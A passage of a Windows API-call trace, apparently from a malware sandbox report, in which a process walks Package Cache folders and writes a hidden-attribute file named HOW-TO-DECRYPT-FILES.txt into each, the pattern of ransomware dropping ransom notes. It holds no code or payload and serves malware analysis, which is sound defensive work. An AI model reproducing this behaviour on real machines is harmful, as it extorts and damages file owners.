dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.094] GetLastError () returned 0x5 [0048.094] SetErrorMode (uMode=0x0) returned 0x1 [0048.095] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.095] GetLastError () returned 0x5 [0048.095] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.095] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.095] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.095] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.095] SetErrorMode (uMode=0x0) returned 0x1 [0048.096] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.096] GetLastError () returned 0x12 [0048.096] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.096] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.096] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.096] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.096] SetErrorMode (uMode=0x0) returned 0x1 [0048.096] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.096] GetLastError () returned 0x12 [0048.096] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.096] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.096] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.097] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.097] SetErrorMode (uMode=0x0) returned 0x1 [0048.097] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.097] GetLastError () returned 0x12 [0048.097] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.097] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.097] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.097] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.097] SetErrorMode (uMode=0x0) returned 0x1 [0048.097] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.098] GetLastError () returned 0x12 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.098] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.098] SetErrorMode (uMode=0x0) returned 0x1 [0048.098] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.098] GetLastError () returned 0x12 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.098] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.098] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.098] SetErrorMode (uMode=0x0) returned 0x1 [0048.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b97c7c | out: lpFileInformation=0x1b97c7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f5c500, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x68f5c500, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x68f5c500, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e)) returned 1 [0048.105] GetLastError () returned 0x12 [0048.105] SetErrorMode (uMode=0x0) returned 0x1 [0048.105] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.114] GetLastError () returned 0x0 [0048.114] GetFileType (hFile=0x184) returned 0x1 [0048.114] SetErrorMode (uMode=0x0) returned 0x1 [0048.114] GetFileType (hFile=0x184) returned 0x1 [0048.114] WriteFile (in: hFile=0x184, lpBuffer=0x1bb372c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1bb372c*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0048.115] GetLastError () returned 0x0 [0048.115] CloseHandle (hObject=0x184) returned 1 [0048.116] GetLastError () returned 0x0 [0048.116] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.116] GetLastError () returned 0x0 [0048.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x1bb5510 | out: lpFileInformation=0x1bb5510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e01900, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x93e01900, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x93e01900, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x23000)) returned 1 [0048.116] GetLastError () returned 0x0 [0048.116] SetErrorMode (uMode=0x0) returned 0x1 [0048.117] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.117] GetLastError () returned 0x5 [0048.118] SetErrorMode (uMode=0x0) returned 0x1 [0048.118] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.118] GetLastError () returned 0x5 [0048.118] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.118] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.118] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.118] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.118] SetErrorMode (uMode=0x0) returned 0x1 [0048.118] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.118] GetLastError () returned 0x12 [0048.118] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.119] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.119] SetErrorMode (uMode=0x0) returned 0x1 [0048.119] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.119] GetLastError () returned 0x12 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.119] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.119] SetErrorMode (uMode=0x0) returned 0x1 [0048.119] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.119] GetLastError () returned 0x12 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.119] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.119] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.119] SetErrorMode (uMode=0x0) returned 0x1 [0048.119] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.120] GetLastError () returned 0x12 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.120] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.120] SetErrorMode (uMode=0x0) returned 0x1 [0048.120] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.120] GetLastError () returned 0x12 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.120] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.120] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.120] SetErrorMode (uMode=0x0) returned 0x1 [0048.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1bd8920 | out: lpFileInformation=0x1bd8920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe34600, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0x1fe34600, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0x1fe34600, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418)) returned 1 [0048.121] GetLastError () returned 0x12 [0048.121] SetErrorMode (uMode=0x0) returned 0x1 [0048.121] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.123] GetLastError () returned 0x0 [0048.123] GetFileType (hFile=0x184) returned 0x1 [0048.123] SetErrorMode (uMode=0x0) returned 0x1 [0048.123] GetFileType (hFile=0x184) returned 0x1 [0048.123] WriteFile (in: hFile=0x184, lpBuffer=0x1bf45a8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1bf45a8*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0048.124] GetLastError () returned 0x0 [0048.124] CloseHandle (hObject=0x184) returned 1 [0048.124] GetLastError () returned 0x0 [0048.124] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.125] GetLastError () returned 0x0 [0048.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x1bf638c | out: lpFileInformation=0x1bf638c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd6e3900, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0xdd6e3900, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0xdd6e3900, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0x25000)) returned 1 [0048.125] GetLastError () returned 0x0 [0048.125] SetErrorMode (uMode=0x0) returned 0x1 [0048.125] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.125] GetLastError () returned 0x5 [0048.126] SetErrorMode (uMode=0x0) returned 0x1 [0048.126] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.127] GetLastError () returned 0x5 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.127] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.127] SetErrorMode (uMode=0x0) returned 0x1 [0048.127] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.127] GetLastError () returned 0x12 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.127] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.127] SetErrorMode (uMode=0x0) returned 0x1 [0048.127] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.127] GetLastError () returned 0x12 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.127] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.127] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.127] SetErrorMode (uMode=0x0) returned 0x1 [0048.128] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.128] GetLastError () returned 0x12 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.128] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.128] SetErrorMode (uMode=0x0) returned 0x1 [0048.128] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.128] GetLastError () returned 0x12 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.128] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.128] SetErrorMode (uMode=0x0) returned 0x1 [0048.128] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.128] GetLastError () returned 0x12 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.128] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.129] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.129] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.129] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.129] SetErrorMode (uMode=0x0) returned 0x1 [0048.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c19710 | out: lpFileInformation=0x1c19710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d80ec00, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0x1d80ec00, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0x1d80ec00, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1)) returned 1 [0048.129] GetLastError () returned 0x12 [0048.129] SetErrorMode (uMode=0x0) returned 0x1 [0048.130] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.141] GetLastError () returned 0x0 [0048.141] GetFileType (hFile=0x184) returned 0x1 [0048.141] SetErrorMode (uMode=0x0) returned 0x1 [0048.141] GetFileType (hFile=0x184) returned 0x1 [0048.141] WriteFile (in: hFile=0x184, lpBuffer=0x1c35580*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ec54, lpOverlapped=0x0 | out: lpBuffer=0x1c35580*, lpNumberOfBytesWritten=0x18ec54*=0x18da, lpOverlapped=0x0) returned 1 [0048.142] GetLastError () returned 0x0 [0048.142] CloseHandle (hObject=0x184) returned 1 [0048.142] GetLastError () returned 0x0 [0048.142] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.142] GetLastError () returned 0x0 [0048.142] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c37354 | out: lpFileInformation=0x1c37354*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd6e3900, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0xdd6e3900, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0xdd6e3900, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0x25000)) returned 1 [0048.144] GetLastError () returned 0x0 [0048.144] SetErrorMode (uMode=0x0) returned 0x1 [0048.144] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0048.145] GetLastError () returned 0x5 [0048.145] SetErrorMode (uMode=0x0) returned 0x1 [0048.146] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.146] GetLastError () returned 0x5 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.146] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0048.146] SetErrorMode (uMode=0x0) returned 0x1 [0048.146] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0048.146] GetLastError () returned 0x12 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.146] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | 